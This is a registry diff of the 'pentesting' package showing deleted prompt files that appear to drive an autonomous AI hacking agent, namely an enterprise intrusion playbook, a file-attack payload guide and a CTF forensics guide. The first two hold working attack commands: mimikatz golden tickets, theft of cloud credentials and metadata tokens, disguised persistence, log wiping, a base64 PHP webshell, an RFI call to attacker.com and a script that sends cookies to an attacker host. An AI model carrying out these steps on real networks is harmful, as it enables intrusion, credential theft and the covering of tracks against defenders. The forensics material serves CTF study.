pentesting 0.73.13 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +120 -44
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-KHXXTHGS.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4UNNRHYY.js +0 -5797
  11. package/dist/chunk-GILD75OT.js +0 -11407
  12. package/dist/chunk-S5ZMXFHR.js +0 -1162
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9777
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-U2N3KWFH.js +0 -13
  23. package/dist/process-registry-4Y3HB4YQ.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,175 +0,0 @@
1
- # Enterprise Pentest — Internal Network Autonomous Assessment
2
-
3
- > **§3 Minimal Specification**: This is a **Bootstrap Reference**, not a prescribed order.
4
- > Adapt based on `get_state`, attack graph observations, and live target behavior.
5
- > **Cross-ref**: ad-attack.md (AD attacks), pivoting.md (lateral movement), zero-day.md (C4)
6
-
7
- ---
8
-
9
- ## Core Principle
10
-
11
- ```
12
- Enterprise environments = layered defense + network segmentation + centralized AD + cloud integration
13
-
14
- Priority:
15
- 1. Map internal network first → identify segments, DCs, critical services
16
- 2. Maximize lateral movement with captured credentials
17
- 3. AD domain → Forest compromise for full privilege escalation
18
- 4. Cloud (AWS/Azure/GCP) pivoting to complete hybrid environment takeover
19
- ```
20
-
21
- ---
22
-
23
- ## Phase 1: Internal Network Enumeration (Immediately after foothold)
24
-
25
- ```
26
- SEGMENT DISCOVERY (run immediately after first shell):
27
- ├── ip a / ifconfig → network interfaces + IP ranges
28
- ├── ip route / netstat -rn → routing table → internal subnet list
29
- ├── arp -a → directly connected hosts
30
- ├── cat /etc/hosts → internal hostname mappings
31
- └── cat /etc/resolv.conf → internal DNS server → domain enumeration base
32
-
33
- ADJACENT SUBNET SCAN:
34
- nmap -sn 10.x.x.0/24
35
- for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done
36
-
37
- DNS ENUMERATION:
38
- dig axfr @internal_dns domain.corp
39
- dnsrecon -d corp.local -t axfr
40
- for i in $(seq 1 254); do host 10.x.x.$i; done | grep "domain name pointer"
41
- ```
42
-
43
- ---
44
-
45
- ## Phase 2: Critical Internal Service Discovery
46
-
47
- ```
48
- CRITICAL SERVICES TO FIND:
49
- ┌─────────────────────────────────────────────────────────────────────┐
50
- │ Service Port Attack Vector │
51
- ├─────────────────────────────────────────────────────────────────────┤
52
- │ Active Directory DC 88/389/636 Kerberos/LDAP/LDAPS │
53
- │ SCCM/WSUS 8530/8531 Privilege escalation, malicious │
54
- │ update delivery │
55
- │ Exchange/Mail 25/443 Internal phishing, relay attacks │
56
- │ Corporate CA (ADCS) 80/443 ESC1~13 ADCS vulnerabilities │
57
- │ Jump Host/Bastion 22/3389 Lateral movement hub │
58
- │ Database servers 1433/3306/5432 Credential reuse + data dump │
59
- │ DevOps infra 8080/9000 Jenkins/SonarQube weak auth → │
60
- │ code execution │
61
- │ Cloud Metadata 169.254.169.254 IAM credential access │
62
- └─────────────────────────────────────────────────────────────────────┘
63
-
64
- SCCM ATTACKS (Enterprise-specific):
65
- 1. net group "SMS Admins" /domain → SCCM administrator list
66
- 2. Extract SCCM NAA (Network Access Account) credentials
67
- 3. Tools: SCCMHunter, SharpSCCM
68
- web_search("SCCM attack lateral movement credential extraction {year}")
69
-
70
- EXCHANGE ATTACKS:
71
- 1. ProxyShell/ProxyLogon: check CVE → run PoC
72
- 2. NTLM relay: responder + ntlmrelayx → capture Exchange auth
73
- 3. EWS (Exchange Web Services): ruler, EWSoauth
74
- ```
75
-
76
- ---
77
-
78
- ## Phase 3: AD Forest Attacks (after single domain compromise)
79
-
80
- ```
81
- FOREST TRUST EXPLOITATION:
82
- ├── Discover trust relationships:
83
- │ nltest /domain_trusts
84
- │ PowerView: Get-DomainTrust
85
-
86
- ├── SID History attack (cross-forest movement):
87
- │ - Current domain DA → target forest Enterprise Admin
88
- │ - mimikatz lsadump::trust /patch → extract trust key
89
- │ - kerberos::golden /user:Administrator /domain:corp.local
90
- │ /sid:S-1-5-21-... /sids:S-1-5-21-TARGET-519 /rc4:TRUSTKEY
91
-
92
- ├── External Trust → Kerberoast across trust:
93
- │ Get-DomainUser -Domain external.corp -SPN
94
- │ Invoke-Kerberoast -Domain external.corp | Export-CSV
95
-
96
- └── SID Filtering bypass:
97
- web_search("SID filtering bypass forest trust attack {year}")
98
-
99
- ENTERPRISE ADMIN PATHS:
100
- 1. Achieve DA in all domains → target Enterprise Admin directly
101
- 2. Schema Admin path → AD schema modification
102
- 3. Corp CA (ADCS) ESC6/ESC8 → Enterprise Admin certificate
103
- ```
104
-
105
- ---
106
-
107
- ## Phase 4: Cloud Pivoting (Hybrid environments)
108
-
109
- ```
110
- ON-PREM → CLOUD PIVOT:
111
-
112
- Credential sources:
113
- env | grep -iE "aws|azure|gcp|secret|key|token"
114
- find / -name "*.env" -o -name "credentials" -o -name "*.pem" -o -name "*.json" 2>/dev/null
115
- cat ~/.aws/credentials ~/.azure/credentials ~/.config/gcloud/credentials.db
116
-
117
- AWS ESCALATION:
118
- aws sts get-caller-identity → current identity
119
- aws iam list-attached-user-policies → current permissions
120
- aws iam list-roles → assumable roles
121
- aws sts assume-role --role-arn arn:... → privilege escalation
122
- → Goal: AdministratorAccess policy acquisition
123
- web_search("AWS privilege escalation IAM misconfiguration {year}")
124
-
125
- AZURE ESCALATION:
126
- az login --use-device-code (or use stolen token)
127
- az account list → accessible subscriptions
128
- az vm list → VM inventory
129
- az keyvault secret list --vault-name ... → dump secrets
130
- Managed Identity → az role assignment list → check permissions
131
- web_search("Azure privilege escalation managed identity {year}")
132
-
133
- GCP ESCALATION:
134
- gcloud auth list → authenticated accounts
135
- gcloud projects list → accessible projects
136
- gcloud iam service-accounts list → service account list
137
- gcloud compute instances list → VM inventory
138
- web_search("GCP privilege escalation service account {year}")
139
-
140
- IMDS (Instance Metadata Service) attack:
141
- AWS: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
142
- Azure: curl -H "Metadata:true" http://169.254.169.254/metadata/identity/oauth2/token
143
- GCP: curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
144
- -H "Metadata-Flavor:Google"
145
- ```
146
-
147
- ---
148
-
149
- ## Phase 5: Long-term Persistence
150
-
151
- ```
152
- ENTERPRISE PERSISTENCE (minimize detection risk):
153
- ├── Domain level: Golden Ticket (10-year validity) → exfiltrate krbtgt hash offline
154
- ├── Silver Ticket: service-specific TGS → permanent access to specific service
155
- ├── Scheduled task: schtasks /create /tn "WindowsUpdate" /tr ... /sc daily (disguised)
156
- ├── WMI persistence: wmic /namespace:\\root\subscription event handler
157
- └── Cloud: backdoor IAM user / Lambda trigger / Lambda persistence
158
-
159
- EVIDENCE CLEANUP (post-detection):
160
- Windows: wevtutil cl System; wevtutil cl Security; wevtutil cl Application
161
- Linux: echo -n > /var/log/auth.log; history -c; unset HISTFILE
162
- Note: Log deletion itself is an IOC — minimal footprint is the guiding principle
163
- ```
164
-
165
- ---
166
-
167
- ## Search Patterns
168
-
169
- ```
170
- web_search("enterprise pentest internal network lateral movement {year}")
171
- web_search("SCCM attack chain privilege escalation credential extraction {year}")
172
- web_search("AD forest trust attack SID filtering bypass Enterprise Admin {year}")
173
- web_search("cloud AWS Azure GCP privilege escalation IAM misconfiguration {year}")
174
- web_search("Exchange server ProxyShell ProxyLogon {version} exploit")
175
- ```
@@ -1,144 +0,0 @@
1
- # File-Based Attacks — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: injection.md (for injection via files), shells.md (web shells), evasion.md (filter bypass)
4
-
5
- ## Core Principle
6
- Files are one of the most powerful attack vectors. There are dozens of file-based
7
- attack techniques, each with hundreds of bypass variants. Search and adapt.
8
-
9
- ## File Attack Type Map
10
-
11
- ```
12
- FILE-BASED ATTACK CATEGORIES:
13
-
14
- ├── 1. Local File Inclusion (LFI)
15
- │ ├── Basic: ../../etc/passwd, ....//....//etc/passwd
16
- │ ├── Null byte: ../../etc/passwd%00 (PHP < 5.3.4)
17
- │ ├── Double encoding: %252e%252e%252f
18
- │ ├── UTF-8 overlong: %c0%ae%c0%ae/
19
- │ ├── Wrappers (PHP): php://filter, php://input, data://, expect://, zip://, phar://
20
- │ │ ├── Read source: php://filter/read=convert.base64-encode/resource=config.php
21
- │ │ ├── RCE: php://input + POST body with PHP code
22
- │ │ ├── RCE: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+
23
- │ │ ├── RCE: expect://id (if expect wrapper enabled)
24
- │ │ └── RCE: phar://malicious.phar (deserialization via phar metadata)
25
- │ ├── Windows: ..\..\windows\system32\drivers\etc\hosts
26
- │ ├── Interesting files to read:
27
- │ │ ├── Linux: /etc/passwd, /etc/shadow, /proc/self/environ, /proc/self/cmdline
28
- │ │ ├── Web: /var/www/html/.env, wp-config.php, config.php, database.yml
29
- │ │ ├── SSH: /home/*/.ssh/id_rsa, /root/.ssh/id_rsa
30
- │ │ ├── Logs: /var/log/apache2/access.log (for log poisoning → RCE)
31
- │ │ ├── Proc: /proc/self/fd/N (leaked file descriptors)
32
- │ │ └── Windows: C:\Windows\win.ini, C:\boot.ini, web.config
33
- │ └── LFI → RCE CHAINS:
34
- │ ├── Log poisoning: inject PHP via User-Agent → include apache/nginx log
35
- │ ├── /proc/self/environ: inject PHP via User-Agent/Referer header
36
- │ ├── PHP session files: inject into session → include /tmp/sess_SESSIONID
37
- │ ├── Temp files: race condition upload → include before cleanup
38
- │ ├── Mail log: send email with PHP code → include /var/mail/www-data
39
- │ └── web_search("LFI to RCE techniques {year}")
40
-
41
- ├── 2. Remote File Inclusion (RFI)
42
- │ ├── Basic: ?page=http://attacker.com/shell.txt
43
- │ ├── Requires: allow_url_include=On (PHP)
44
- │ ├── Protocol: http://, https://, ftp://
45
- │ ├── Null byte bypass: ?page=http://attacker.com/shell.txt%00
46
- │ └── Often disabled — check and try, but LFI is more common
47
-
48
- ├── 3. Path Traversal (Directory Traversal)
49
- │ ├── Basic: ../../../etc/passwd
50
- │ ├── Encoded: %2e%2e%2f, %2e%2e/, ..%2f
51
- │ ├── Double encoded: %252e%252e%252f
52
- │ ├── Unicode: ..%c0%af, ..%ef%bc%8f
53
- │ ├── Oversized: ....//, ....\/
54
- │ ├── Absolute path: /etc/passwd (if app blindly prepends dir)
55
- │ ├── Null byte: ../etc/passwd%00.png (bypass extension checks)
56
- │ ├── In API parameters, cookies, headers, file names, ZIP entries
57
- │ └── Use payload_mutate with context="path" for systematic variants
58
-
59
- ├── 4. File Upload Attacks
60
- │ ├── BYPASS CATEGORIES (try ALL when blocked):
61
- │ │ ├── Extension bypass:
62
- │ │ │ ├── Double extension: shell.php.jpg, shell.jpg.php
63
- │ │ │ ├── Alternative extensions: .php3, .php4, .php5, .phtml, .phar, .phps
64
- │ │ │ ├── Case: .PHP, .Php, .pHp
65
- │ │ │ ├── Special chars: shell.php%00.jpg, shell.php\x00.jpg, shell.php;.jpg
66
- │ │ │ ├── Dot trailing: shell.php., shell.php..
67
- │ │ │ ├── Space: shell.php (with trailing space)
68
- │ │ │ └── web_search("file upload extension bypass {language}")
69
- │ │ │
70
- │ │ ├── Content-Type bypass:
71
- │ │ │ ├── Change Content-Type to image/jpeg, image/png, image/gif
72
- │ │ │ └── Keep malicious content, fake the content-type header
73
- │ │ │
74
- │ │ ├── Magic bytes bypass:
75
- │ │ │ ├── GIF89a<?php system($_GET['cmd']); ?> (GIF header)
76
- │ │ │ ├── \xFF\xD8\xFF\xE0 + PHP code (JPEG header)
77
- │ │ │ ├── \x89PNG\r\n\x1a\n + PHP code (PNG header)
78
- │ │ │ └── Prepend legitimate file header to malicious code
79
- │ │ │
80
- │ │ ├── Server processing bypass:
81
- │ │ │ ├── .htaccess upload: AddType application/x-httpd-php .jpg
82
- │ │ │ ├── web.config upload (IIS): handlers → execute aspx
83
- │ │ │ ├── Polyglot files: valid image AND valid PHP/JSP/ASP
84
- │ │ │ └── Filename manipulation: shell.php%20, shell.php::$DATA (Windows ADS)
85
- │ │ │
86
- │ │ └── Race condition:
87
- │ │ ├── Upload → access before validation/deletion
88
- │ │ ├── Write script for concurrent upload + access
89
- │ │ └── web_search("file upload race condition exploit")
90
- │ │
91
- │ ├── POST-UPLOAD EXPLOITATION:
92
- │ │ ├── Access uploaded shell: try common upload dirs
93
- │ │ │ /uploads/, /images/, /media/, /files/, /tmp/, /static/
94
- │ │ ├── If path unknown: LFI to find path, or fuzz the upload directory
95
- │ │ └── Upgrade web shell to reverse shell (see shells.md)
96
- │ │
97
- │ └── SEARCH PATTERN:
98
- │ web_search("file upload bypass techniques {year}")
99
- │ web_search("{framework} file upload vulnerability")
100
- │ web_search("file upload {defense} bypass")
101
-
102
- ├── 5. ZIP/Archive Attacks
103
- │ ├── Zip Slip: path traversal in archive (../../../etc/cron.d/evil)
104
- │ ├── ZIP symlink: include symlink to /etc/passwd → extracted by server
105
- │ ├── ZIP bomb: denial of service (if relevant)
106
- │ ├── Polyglot ZIP: valid ZIP + valid PHP
107
- │ └── web_search("zip slip vulnerability exploitation")
108
-
109
- ├── 6. Symlink Attacks
110
- │ ├── Create symlink to sensitive file → access through web
111
- │ ├── Race condition: symlink swap between check and use (TOCTOU)
112
- │ ├── Git symlink: include symlink in git repo → checkout reads target file
113
- │ └── Relevant in: file upload, archive extraction, temp file operations
114
-
115
- ├── 7. Server-Side Processing Attacks
116
- │ ├── ImageMagick (ImageTragick): web_search("imagemagick exploit CVE-2016-3714")
117
- │ │ ├── SVG with embedded commands
118
- │ │ ├── MVG file format exploitation
119
- │ │ └── Ghostscript exploitation
120
- │ ├── FFmpeg: SSRF via HLS playlist, local file read
121
- │ ├── LibreOffice: macro execution, SSRF via document links
122
- │ ├── PDF generators (wkhtmltopdf, dompdf): SSRF, XSS, local file read
123
- │ │ ├── <iframe src="file:///etc/passwd">
124
- │ │ ├── <script>document.location="http://attacker/?"+document.cookie</script>
125
- │ │ └── web_search("{pdf_generator} SSRF local file read")
126
- │ └── Document parsers: DOCX/XLSX (XXE via embedded XML), CSV injection
127
-
128
- └── 8. SSRF via File Operations
129
- ├── URL parameter → file:///etc/passwd, gopher://, dict://
130
- ├── Cloud metadata: http://169.254.169.254/latest/meta-data/
131
- ├── Internal services: http://localhost:6379/ (Redis), http://localhost:9200/ (Elastic)
132
- └── See web.md SSRF section for comprehensive SSRF methodology
133
- ```
134
-
135
- ## 🧠 File Attack Search Patterns
136
- ```
137
- web_search("LFI to RCE {language} {framework} techniques")
138
- web_search("file upload bypass {defense} {year}")
139
- web_search("path traversal {application} CVE")
140
- web_search("{file_type} polyglot {language}")
141
- web_search("file inclusion wrapper {language}")
142
- web_search("PayloadsAllTheThings file inclusion")
143
- web_search("PayloadsAllTheThings upload")
144
- ```
@@ -1,313 +0,0 @@
1
- # Forensics & Steganography — Comprehensive CTF Guide
2
-
3
- > **Cross-ref**: file-attacks.md (file operations), pwn.md (binary analysis)
4
-
5
- ## Phase 0: File Analysis — Universal First Steps
6
-
7
- ```
8
- With ANY unknown file:
9
- ├── file <file> → identify type (NEVER trust extension alone!)
10
- ├── strings <file> → extract readable strings
11
- ├── strings -el <file> → UTF-16 strings (Windows executables)
12
- ├── xxd <file> | head → hex dump first bytes (check magic bytes)
13
- ├── exiftool <file> → metadata (GPS, creator, timestamps, hidden fields)
14
- ├── binwalk <file> → embedded files/filesystems
15
- │ └── binwalk -e <file> → extract embedded files
16
- ├── foremost <file> → file carving (alternative to binwalk)
17
- └── entropy analysis:
18
- binwalk -E <file> → high entropy = encrypted/compressed
19
-
20
- Magic bytes quick reference:
21
- ├── 89 50 4E 47 → PNG
22
- ├── FF D8 FF → JPEG
23
- ├── 47 49 46 38 → GIF
24
- ├── 50 4B 03 04 → ZIP (also DOCX, XLSX, APK, JAR)
25
- ├── 1F 8B → GZIP
26
- ├── 42 5A 68 → BZIP2
27
- ├── 7F 45 4C 46 → ELF (Linux binary)
28
- ├── 4D 5A → PE (Windows executable)
29
- ├── 25 50 44 46 → PDF
30
- ├── D0 CF 11 E0 → MS Office (OLE2) — DOC, XLS, PPT
31
- ├── 52 49 46 46 → RIFF (WAV, AVI, WebP)
32
- └── 00 00 00 18/20 → MP4 (ftyp)
33
-
34
- File repair:
35
- ├── Corrupted header? → fix magic bytes manually with hex editor
36
- ├── PNG: pngcheck -v <file> → diagnose chunk errors
37
- │ Fix CRC: python3 script to recalculate chunk CRC
38
- │ Fix IHDR: width/height may be wrong → brute-force dimensions
39
- ├── ZIP: zip -FF corrupt.zip --out fixed.zip → repair archive
40
- └── JPEG: truncated? → might still have flag in extractable data
41
- ```
42
-
43
- ## Steganography
44
-
45
- ```
46
- ═══════════════════════════════════════
47
- Image Steganography:
48
- ═══════════════════════════════════════
49
-
50
- JPEG:
51
- ├── steghide extract -sf <image.jpg> -p "" → try empty password first
52
- ├── steghide extract -sf <image.jpg> -p <pw> → with password
53
- ├── stegseek <image.jpg> rockyou.txt → brute force steghide password
54
- ├── stegcracker <image.jpg> rockyou.txt → alternative brute force
55
- ├── jsteg reveal <image.jpg> → jsteg extraction
56
- └── outguess -r <image.jpg> output.txt → outguess extraction
57
-
58
- PNG / BMP:
59
- ├── zsteg <image.png> → LSB analysis (multiple channels, orders)
60
- ├── zsteg -a <image.png> → try ALL extraction methods
61
- ├── pngcheck -v <image.png> → PNG structure validation
62
- ├── IDAT chunks: hidden data after IEND marker
63
- │ python3 -c "data=open('img.png','rb').read(); print(data[data.index(b'IEND')+8:])"
64
- ├── LSB manual extraction:
65
- │ from PIL import Image
66
- │ img = Image.open('img.png')
67
- │ bits = ''.join(str(px & 1) for px in img.getdata() for _ in [px] if isinstance(px, int))
68
- │ # or for RGB: iterate R,G,B channels separately
69
- └── Compare two similar images:
70
- compare <img1> <img2> diff.png (ImageMagick)
71
- → pixel differences often reveal hidden data
72
-
73
- GIF:
74
- ├── Multiple frames may hide data across frames
75
- ├── identify -verbose <file.gif> → frame count
76
- ├── convert <file.gif> frame_%d.png → extract all frames
77
- └── Hidden frame with very short display time
78
-
79
- General image:
80
- ├── StegSolve.jar → visual analysis (bit plane viewer, color channels)
81
- ├── CyberChef: Extract LSB
82
- ├── Compare file size to expected → hidden data appended
83
- └── Check alpha channel (transparency) for hidden data
84
- from PIL import Image
85
- img = Image.open('img.png').split()[-1] # alpha channel
86
-
87
- ═══════════════════════════════════════
88
- Audio Steganography:
89
- ═══════════════════════════════════════
90
- ├── Audacity → spectrogram view (Analyze → Plot Spectrum or View → Spectrogram)
91
- │ Hidden images/text visible in frequency domain
92
- ├── sonic-visualiser → detailed spectrogram layers
93
- ├── DTMF decoder → phone dial tones (multimon-ng)
94
- ├── morse-decoder → morse code in audio
95
- ├── wav hidden data:
96
- │ python3 → read raw samples → LSB extraction
97
- │ stegolsb wavsteg -r -i audio.wav -o output.txt
98
- ├── SSTV (Slow-Scan Television):
99
- │ qsstv or RX-SSTV → decode image from audio signal
100
- │ Common in space/radio-themed CTFs
101
- └── mp3stego → MP3-specific steganography
102
-
103
- ═══════════════════════════════════════
104
- Text / Document Steganography:
105
- ═══════════════════════════════════════
106
- ├── Whitespace stego: stegsnow -C <file>
107
- │ Tabs and spaces encode binary data at end of lines
108
- ├── Zero-width characters: Unicode U+200B, U+200C, U+200D, U+FEFF
109
- │ cat -v <file> | grep -o '\xE2\x80[\x8B-\x8F]' → detect
110
- ├── Homoglyph attacks: visually identical but different Unicode chars
111
- │ 'а' (Cyrillic) vs 'a' (Latin) → different bytes
112
- ├── Line-ending manipulation: CRLF vs LF patterns encode bits
113
- ├── PDF steganography:
114
- │ ├── pdf-parser.py <file.pdf> → analyze objects
115
- │ ├── Hidden JavaScript: /JavaScript, /JS keys
116
- │ ├── Embedded files in PDF streams
117
- │ ├── Invisible text (white on white)
118
- │ └── pdftotext <file.pdf> → extract all text
119
- └── Office documents (DOCX/XLSX):
120
- ├── unzip <file.docx> → extract XML contents
121
- ├── Hidden text (white font, tiny size)
122
- ├── Document properties / custom metadata
123
- └── Embedded OLE objects / macros
124
- ```
125
-
126
- ## Network Forensics (PCAP)
127
-
128
- ```
129
- ═══════════════════════════════════════
130
- Wireshark / tshark analysis:
131
- ═══════════════════════════════════════
132
- ├── tshark -r file.pcap -T fields -e data → raw data extraction
133
- ├── tshark -r file.pcap -Y "http" -T fields -e http.request.uri
134
- ├── tshark -r file.pcap -Y "ftp" -T fields -e ftp.request.arg
135
- ├── Follow TCP stream: tcp.stream eq <N>
136
- ├── Export HTTP objects: File → Export Objects → HTTP
137
- └── Statistics → Protocol Hierarchy → see what protocols are used
138
-
139
- ═══════════════════════════════════════
140
- Common PCAP patterns in CTF:
141
- ═══════════════════════════════════════
142
- ├── HTTP: credentials in POST, file downloads, flag in response
143
- ├── FTP: RETR/STOR commands → extract transferred files
144
- │ tshark -r file.pcap -Y "ftp-data" -T fields -e data | xxd -r -p > extracted
145
- ├── DNS exfiltration:
146
- │ ├── Subdomain encoding: base64/hex data in query names
147
- │ ├── TXT records containing hidden data
148
- │ └── tshark -r file.pcap -Y "dns.qry.type==16" -T fields -e dns.txt
149
- ├── ICMP tunneling:
150
- │ ├── Data hidden in ICMP payload (ping data section)
151
- │ └── tshark -r file.pcap -Y "icmp" -T fields -e data
152
- ├── TLS/SSL:
153
- │ ├── If RSA private key available: edit → preferences → TLS → RSA keys
154
- │ ├── If SSLKEYLOGFILE available: set in TLS preferences → pre-master secret log
155
- │ └── Check for self-signed certs, weak ciphers, heartbleed
156
- ├── USB keyboard capture:
157
- │ ├── tshark -r file.pcap -Y "usb.transfer_type==0x01" -T fields -e usbhid.data
158
- │ └── Map HID keycodes to characters (0x04=a, 0x05=b, ...)
159
- ├── WiFi (802.11):
160
- │ ├── aircrack-ng file.pcap -w rockyou.txt → crack WPA
161
- │ └── airdecap-ng -p <password> file.pcap → decrypt traffic
162
- └── Custom protocols:
163
- ├── Unknown ports → analyze payload patterns manually
164
- └── Scapy: rdpcap('file.pcap') → programmatic analysis
165
-
166
- ═══════════════════════════════════════
167
- Key Wireshark filters:
168
- ═══════════════════════════════════════
169
- ├── http.request.method == "POST" → credential submissions
170
- ├── ftp.request.command == "PASS" → FTP passwords
171
- ├── smtp contains "AUTH" → email credentials
172
- ├── tcp.flags.syn == 1 → connection attempts
173
- ├── frame contains "flag" → direct flag search
174
- ├── !(arp || dns || mdns) → filter noise
175
- ├── ip.addr == 10.0.0.1 → specific host traffic
176
- └── tcp.port == 4444 → specific port (reverse shell?)
177
- ```
178
-
179
- ## Memory Forensics
180
-
181
- ```
182
- ═══════════════════════════════════════
183
- Volatility 3 (preferred):
184
- ═══════════════════════════════════════
185
- Profile detection:
186
- ├── vol3 -f memory.dmp banners.Banners → detect OS
187
- ├── vol3 -f memory.dmp windows.info → Windows version info
188
- └── vol3 -f memory.dmp linux.bash → Linux bash history
189
-
190
- Key plugins — Windows:
191
- ├── vol3 -f memory.dmp windows.pslist → process list
192
- ├── vol3 -f memory.dmp windows.pstree → process tree
193
- ├── vol3 -f memory.dmp windows.cmdline → command history
194
- ├── vol3 -f memory.dmp windows.filescan → file handles in memory
195
- ├── vol3 -f memory.dmp windows.dumpfiles → extract files
196
- │ --pid <PID> → filter by process
197
- ├── vol3 -f memory.dmp windows.hashdump → SAM password hashes → crack with hashcat!
198
- ├── vol3 -f memory.dmp windows.netscan → network connections
199
- ├── vol3 -f memory.dmp windows.registry.hivelist → registry hives
200
- ├── vol3 -f memory.dmp windows.registry.printkey → dump registry key
201
- ├── vol3 -f memory.dmp windows.malfind → detect injected code
202
- ├── vol3 -f memory.dmp windows.envars → environment variables (FLAG!)
203
- └── vol3 -f memory.dmp windows.clipboard → clipboard content
204
-
205
- Key plugins — Linux:
206
- ├── vol3 -f memory.dmp linux.pslist → processes
207
- ├── vol3 -f memory.dmp linux.bash → bash history (FLAG!)
208
- ├── vol3 -f memory.dmp linux.check_syscall → rootkit detection
209
- ├── vol3 -f memory.dmp linux.proc.Maps → memory maps
210
- └── strings memory.dmp | grep -i "flag\|password\|secret\|key"
211
-
212
- ═══════════════════════════════════════
213
- Volatility 2 (older workflow):
214
- ═══════════════════════════════════════
215
- ├── vol.py -f memory.dmp imageinfo → determine profile
216
- ├── vol.py -f memory.dmp --profile=<P> pslist
217
- ├── vol.py -f memory.dmp --profile=<P> hashdump
218
- ├── vol.py -f memory.dmp --profile=<P> mimikatz → credential extraction
219
- ├── vol.py -f memory.dmp --profile=<P> memdump -p <PID> -D output/
220
- └── vol.py -f memory.dmp --profile=<P> timeliner → timeline analysis
221
-
222
- ═══════════════════════════════════════
223
- Quick wins in memory forensics:
224
- ═══════════════════════════════════════
225
- ├── 1. strings + grep for flag patterns FIRST (fastest!)
226
- ├── 2. Process list → suspicious process? → dump its memory
227
- ├── 3. Command history (cmdline/bash) → look for flag manipulation
228
- ├── 4. Environment variables → flag stored in env
229
- ├── 5. Network connections → hidden services, exfiltration
230
- ├── 6. File scan → find flag.txt, secret.txt in memory
231
- ├── 7. Registry → passwords, recent documents, USB history
232
- └── 8. Clipboard → copied passwords/flags
233
- ```
234
-
235
- ## Disk Forensics
236
-
237
- ```
238
- ═══════════════════════════════════════
239
- Disk / Filesystem Analysis:
240
- ═══════════════════════════════════════
241
- ├── fdisk -l disk.img → partition layout
242
- ├── mmls disk.img → partition table (sleuthkit)
243
- ├── mount -o loop,ro,offset=<N> disk.img /mnt → mount partition
244
- │ offset = start_sector × 512
245
- ├── autopsy → GUI forensic suite
246
- ├── Sleuthkit tools:
247
- │ ├── fls -r disk.img → list all files (including deleted!)
248
- │ ├── icat disk.img <inode> → extract file by inode
249
- │ ├── blkcat disk.img <block> → read specific block
250
- │ └── tsk_recover -e disk.img output/ → recover all files
251
- ├── photorec disk.img → recover deleted files (by file signature)
252
- ├── testdisk disk.img → partition recovery + file undelete
253
- └── Check slack space:
254
- blkstat disk.img <block> → check if block is allocated
255
-
256
- ═══════════════════════════════════════
257
- Specific filesystem features:
258
- ═══════════════════════════════════════
259
- ├── NTFS Alternate Data Streams:
260
- │ ├── dir /r → list ADS on Windows
261
- │ ├── getfattr -R -d /mnt/* → list ADS on mounted NTFS
262
- │ └── cat /mnt/file:hidden_stream → read ADS content
263
- ├── ext4 extended attributes:
264
- │ ├── getfattr -d <file> → list xattrs
265
- │ └── Journal: jls / jcat to read deleted journal entries
266
- ├── FAT filesystem:
267
- │ ├── No file permissions → everything is readable
268
- │ ├── Deleted files: filename starts with 0xE5
269
- │ └── Volume label may contain clues
270
- └── Filesystem timeline:
271
- fls -m "/" -r disk.img | mactime -b - > timeline.csv
272
